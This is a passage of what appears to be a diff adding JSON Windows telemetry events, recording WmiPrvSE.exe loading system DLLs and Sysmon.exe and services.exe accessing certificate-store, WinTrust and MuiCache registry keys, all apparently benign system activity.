"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ncrypt.dll", + "image_path": "C:\\Windows\\System32\\ncrypt.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": 
"CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntasn1.dll", + "image_path": "C:\\Windows\\System32\\ntasn1.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570848240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": 
"cfgbkend.dll", + "image_path": "C:\\Windows\\System32\\cfgbkend.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + 
